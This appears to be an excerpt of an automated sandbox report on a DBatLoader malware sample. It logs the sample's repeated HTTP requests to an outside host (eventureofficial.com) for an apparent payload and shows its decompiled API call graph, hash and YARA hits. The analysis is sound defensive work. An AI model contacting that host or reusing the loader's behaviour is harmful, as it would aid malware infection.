                2024-04-25 17:26:04 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:26:04 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                53192.168.2.94982268.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:26:05 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:26:06 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:26:06 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                54192.168.2.94982468.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:26:07 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:26:08 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:26:08 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                55192.168.2.94982668.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:26:09 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:26:10 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:26:10 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                56192.168.2.94982868.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:26:11 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:26:12 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:26:12 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                57192.168.2.94983068.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:26:13 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:26:14 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:26:14 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                58192.168.2.94983268.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:26:15 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:26:16 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:26:16 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                59192.168.2.94983468.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:26:17 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:26:18 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:26:18 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                60192.168.2.94983668.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:26:19 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:26:20 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:26:20 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Target ID:0
                Start time:19:24:14
                Start date:25/04/2024
                Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe"
                Imagebase:0x400000
                File size:941'568 bytes
                MD5 hash:8342A62CBD21058FAF999A350267B4F9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Borland Delphi
                Yara matches:
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2679644155.000000000232C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1439006094.000000007FD80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:false

                Reset < >

                  Execution Graph

                  Execution Coverage:4.7%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:13%
                  Total number of Nodes:215
                  Total number of Limit Nodes:12
                  execution_graph 33188 280e320 33189 280e33b 33188->33189 33190 280e32e VariantClear 33188->33190 33191 280e351 33189->33191 33192 280e342 33189->33192 33202 280dfec 33190->33202 33195 280e372 33191->33195 33196 280e369 33191->33196 33201 280e339 33191->33201 33206 28044a0 33192->33206 33211 2812e60 EnterCriticalSection LeaveCriticalSection 33195->33211 33210 280e1a4 52 API calls 33196->33210 33199 280e37b 33200 280e38b VariantClear VariantInit 33199->33200 33199->33201 33200->33201 33203 280dff0 33202->33203 33204 280dff5 33202->33204 33212 280dd98 43 API calls 33203->33212 33204->33201 33207 28044c1 33206->33207 33208 28044a6 33206->33208 33207->33201 33208->33207 33213 2802c2c 11 API calls 33208->33213 33210->33201 33211->33199 33212->33204 33213->33207 33214 2800009 33217 286c000 33214->33217 33226 286c216 33217->33226 33219 286c00f 33220 2800015 33219->33220 33221 286c0c7 33219->33221 33229 286c14d 33219->33229 33221->33220 33233 2829b54 timeSetEvent 33221->33233 33234 2804c60 33221->33234 33244 280415c 33221->33244 33258 286c3ad GetPEB 33226->33258 33228 286c222 33228->33219 33230 286c16a 33229->33230 33231 286c1a0 33230->33231 33232 286c15d LoadLibraryA 33230->33232 33231->33221 33232->33230 33232->33231 33233->33220 33235 2804c64 33234->33235 33236 2804c87 33234->33236 33237 2804c24 33235->33237 33238 2804c77 SysReAllocStringLen 33235->33238 33236->33220 33239 2804c38 33237->33239 33240 2804c2a SysFreeString 33237->33240 33238->33236 33241 2804bf4 33238->33241 33239->33220 33240->33239 33242 2804c10 33241->33242 33243 2804c00 SysAllocStringLen 33241->33243 33242->33220 33243->33241 33243->33242 33245 28041a2 33244->33245 33246 280421b 33245->33246 33247 28043ac 33245->33247 33260 28040f4 33246->33260 33250 28043dd 33247->33250 33253 28043ee 33247->33253 33265 2804320 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 33250->33265 33252 28043e7 33252->33253 33254 2804433 FreeLibrary 33253->33254 33255 2804457 33253->33255 33254->33253 33256 2804460 33255->33256 33257 2804466 ExitProcess 33255->33257 33256->33257 33259 286c3c0 33258->33259 33259->33228 33261 2804137 33260->33261 33262 2804104 33260->33262 33261->33220 33262->33261 33266 280582c 33262->33266 33270 28015cc 33262->33270 33265->33252 33267 2805858 33266->33267 33268 280583c GetModuleFileNameA 33266->33268 33267->33262 33274 2805a90 GetModuleFileNameA RegOpenKeyExA 33268->33274 33293 2801560 33270->33293 33272 28015d4 VirtualAlloc 33273 28015eb 33272->33273 33273->33262 33275 2805b13 33274->33275 33276 2805ad3 RegOpenKeyExA 33274->33276 33292 28058cc 12 API calls 33275->33292 33276->33275 33277 2805af1 RegOpenKeyExA 33276->33277 33277->33275 33279 2805b9c lstrcpynA GetThreadLocale GetLocaleInfoA 33277->33279 33283 2805bd3 33279->33283 33284 2805cb6 33279->33284 33280 2805b38 RegQueryValueExA 33281 2805b58 RegQueryValueExA 33280->33281 33282 2805b76 RegCloseKey 33280->33282 33281->33282 33282->33267 33283->33284 33286 2805be3 lstrlenA 33283->33286 33284->33267 33287 2805bfb 33286->33287 33287->33284 33288 2805c20 lstrcpynA LoadLibraryExA 33287->33288 33289 2805c48 33287->33289 33288->33289 33289->33284 33290 2805c52 lstrcpynA LoadLibraryExA 33289->33290 33290->33284 33291 2805c84 lstrcpynA LoadLibraryExA 33290->33291 33291->33284 33292->33280 33294 2801500 33293->33294 33294->33272 33295 2829b48 33298 281d5d0 33295->33298 33299 281d5d8 33298->33299 33299->33299 35797 2802ee0 QueryPerformanceCounter 33299->35797 33301 281d5f9 33302 281d603 InetIsOffline 33301->33302 33303 281d60d 33302->33303 33304 281d61e 33302->33304 35809 28044f4 33303->35809 33305 28044f4 11 API calls 33304->33305 33307 281d62d 33305->33307 35800 2804824 33307->35800 35798 2802ef8 GetTickCount 35797->35798 35799 2802eed 35797->35799 35798->33301 35799->33301 35801 2804835 35800->35801 35802 2804872 35801->35802 35803 280485b 35801->35803 35824 2804564 35802->35824 35815 2804b90 35803->35815 35806 28048a3 35807 2804868 35807->35806 35808 28044f4 11 API calls 35807->35808 35808->35806 35810 28044f8 35809->35810 35813 2804508 35809->35813 35812 2804564 11 API calls 35810->35812 35810->35813 35811 2804536 35811->33307 35812->35813 35813->35811 35831 2802c2c 11 API calls 35813->35831 35816 2804b9d 35815->35816 35823 2804bcd 35815->35823 35817 2804bc6 35816->35817 35819 2804ba9 35816->35819 35820 2804564 11 API calls 35817->35820 35818 28044a0 11 API calls 35821 2804bb7 35818->35821 35829 2802c44 11 API calls 35819->35829 35820->35823 35821->35807 35823->35818 35825 2804568 35824->35825 35826 280458c 35824->35826 35830 2802c10 11 API calls 35825->35830 35826->35807 35828 2804575 35828->35807 35829->35821 35830->35828 35831->35811 35832 2801c6c 35833 2801d04 35832->35833 35834 2801c7c 35832->35834 35837 2801f58 35833->35837 35838 2801d0d 35833->35838 35835 2801cc0 35834->35835 35836 2801c89 35834->35836 35839 2801724 10 API calls 35835->35839 35840 2801c94 35836->35840 35880 2801724 35836->35880 35841 2801fec 35837->35841 35846 2801f68 35837->35846 35847 2801fac 35837->35847 35842 2801e24 35838->35842 35843 2801d25 35838->35843 35844 2801cd7 35839->35844 35856 2801e55 Sleep 35842->35856 35857 2801e7c 35842->35857 35860 2801e95 35842->35860 35848 2801d2c 35843->35848 35852 2801d48 35843->35852 35853 2801dfc 35843->35853 35866 2801a8c 8 API calls 35844->35866 35869 2801cfd 35844->35869 35850 2801724 10 API calls 35846->35850 35849 2801fb2 35847->35849 35854 2801724 10 API calls 35847->35854 35861 2801f82 35850->35861 35851 2801724 10 API calls 35868 2801f2c 35851->35868 35858 2801d79 Sleep 35852->35858 35864 2801d9c 35852->35864 35855 2801724 10 API calls 35853->35855 35870 2801fc1 35854->35870 35873 2801e05 35855->35873 35856->35857 35862 2801e6f Sleep 35856->35862 35857->35851 35857->35860 35863 2801d91 Sleep 35858->35863 35858->35864 35859 2801ca1 35871 2801cb9 35859->35871 35904 2801a8c 35859->35904 35874 2801a8c 8 API calls 35861->35874 35877 2801fa7 35861->35877 35862->35842 35863->35852 35865 2801e1d 35866->35869 35868->35860 35872 2801a8c 8 API calls 35868->35872 35870->35877 35878 2801a8c 8 API calls 35870->35878 35875 2801f50 35872->35875 35873->35865 35876 2801a8c 8 API calls 35873->35876 35874->35877 35876->35865 35879 2801fe4 35878->35879 35881 2801968 35880->35881 35882 280173c 35880->35882 35883 2801a80 35881->35883 35884 2801938 35881->35884 35893 28017cb Sleep 35882->35893 35894 280174e 35882->35894 35885 2801684 VirtualAlloc 35883->35885 35886 2801a89 35883->35886 35890 2801947 Sleep 35884->35890 35897 2801986 35884->35897 35888 28016bf 35885->35888 35889 28016af 35885->35889 35886->35859 35887 280175d 35887->35859 35888->35859 35921 2801644 35889->35921 35891 280195d Sleep 35890->35891 35890->35897 35891->35884 35893->35894 35896 28017e4 Sleep 35893->35896 35894->35887 35895 280182c 35894->35895 35898 280180a Sleep 35894->35898 35902 28015cc VirtualAlloc 35895->35902 35903 2801838 35895->35903 35896->35882 35899 28015cc VirtualAlloc 35897->35899 35901 28019a4 35897->35901 35898->35895 35900 2801820 Sleep 35898->35900 35899->35901 35900->35894 35901->35859 35902->35903 35903->35859 35905 2801aa1 35904->35905 35906 2801b6c 35904->35906 35908 2801aa7 35905->35908 35911 2801b13 Sleep 35905->35911 35907 28016e8 35906->35907 35906->35908 35910 2801c66 35907->35910 35913 2801644 2 API calls 35907->35913 35909 2801ab0 35908->35909 35912 2801b4b Sleep 35908->35912 35918 2801b81 35908->35918 35909->35871 35910->35871 35911->35908 35914 2801b2d Sleep 35911->35914 35915 2801b61 Sleep 35912->35915 35912->35918 35916 28016f5 VirtualFree 35913->35916 35914->35905 35915->35908 35917 280170d 35916->35917 35917->35871 35919 2801c00 VirtualFree 35918->35919 35920 2801ba4 35918->35920 35919->35871 35920->35871 35922 2801681 35921->35922 35923 280164d 35921->35923 35922->35888 35923->35922 35924 280164f Sleep 35923->35924 35925 2801664 35924->35925 35925->35922 35926 2801668 Sleep 35925->35926 35926->35923

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 281d5d0-281d5d3 1 281d5d8-281d5dd 0->1 1->1 2 281d5df-281d60b call 2802ee0 call 2802f08 InetIsOffline 1->2 7 281d60d-281d61c call 28044f4 2->7 8 281d61e-281d628 call 28044f4 2->8 11 281d62d-281e0f0 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804698 * 2 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2817ce4 call 2804964 call 2804698 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28047b0 call 2807e18 7->11 8->11 351 281e203-281e305 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28044f4 11->351 352 281e0f6-281e1e9 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 11->352 411 281e30a-281e432 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 280c320 call 28044f4 351->411 408 281e1ee-281e1fe call 28044f4 352->408 408->411 445 281e434-281e437 411->445 446 281e439-281e7e9 call 28049c4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28044f4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804964 call 2804698 call 2807e18 411->446 445->446 555 281efab-281f583 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804da4 call 281c4dc call 28044f4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 281c640 call 28057dc call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28044f4 * 2 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 281c5c8 446->555 556 281e7ef-281ec44 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804da4 call 281c4dc call 28044f4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 281c640 call 28057dc call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28044f4 call 281c5c8 446->556 809 2820785-2820970 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 555->809 942 281f589-281fab8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2807a88 call 281d270 call 28044f4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 281c640 call 28057dc call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 555->942 556->809 810 281ec4a-281efa6 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804964 call 2804d38 call 281c4dc call 28044f4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 556->810 977 2820975-2820988 809->977 810->809 1432 281fac2-281fcd7 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28044f4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 281c8ac 942->1432 980 282098a-282098d 977->980 981 282098f-2820994 977->981 980->981 984 282099a-2821135 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2807a88 call 281d270 call 28044f4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 281d20c call 28044f4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804728 call 281c640 call 28057dc call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28044f4 * 11 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804964 call 2804698 call 2807e3c 981->984 985 2828b9b-2828fb5 call 28044c4 * 5 call 2804c24 call 28044a0 call 2804c24 call 28044c4 * 3 call 28044a0 call 28044c4 * 2 call 2804c24 call 28044c4 call 2804c24 call 28044c4 * 2 call 28044a0 call 28044c4 * 2 call 28044a0 call 28044c4 call 2804c3c call 28044c4 * 2 call 2804c24 call 28044a0 call 2804c24 call 28044c4 * 2 call 2804c24 call 28044a0 call 2804c24 call 28044c4 call 2804c24 call 28044a0 call 2804c24 call 28044c4 call 2804c24 call 28044a0 call 2804c24 call 28044c4 call 28044a0 call 28044c4 * 2 call 28057a0 call 28044c4 * 2 call 280e3b0 call 28044c4 * 2 call 2805e70 call 28044c4 call 28057a0 call 28044c4 call 28044a0 call 28044c4 * 2 call 28057a0 call 28044c4 call 2804c24 call 28044c4 call 2804c24 call 28044c4 call 28057a0 call 28044c4 call 2804c24 call 28044c4 * 4 981->985 1621 2821324-282142f call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 984->1621 1622 282113b-282131f call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804964 call 2804698 call 2808004 984->1622 1563 2820772-282077f 1432->1563 1564 281fcdd-281fde6 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 281d110 1432->1564 1563->809 1563->1432 1564->1563 1629 281fdec-281ffee call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 CoInitialize call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2816d84 1564->1629 1708 2821431-2821434 1621->1708 1709 2821436-28215a5 call 28049c4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 1621->1709 1622->1621 1801 281fff3-282006e call 2812854 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 1629->1801 1708->1709 1818 28215aa-282164e call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 28048b0 1709->1818 1828 2820073-282007a call 2817be8 1801->1828 1861 2821654-28216b7 call 2804824 call 2804964 call 2804698 call 2807e18 1818->1861 1862 2823345-2823c13 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 281c78c call 28044f4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2807a88 call 281d270 call 28044f4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 call 281d198 call 281d20c call 28044f4 call 2804824 call 2804964 call 2804698 call 28047b0 call 2804964 call 2804698 call 2817be8 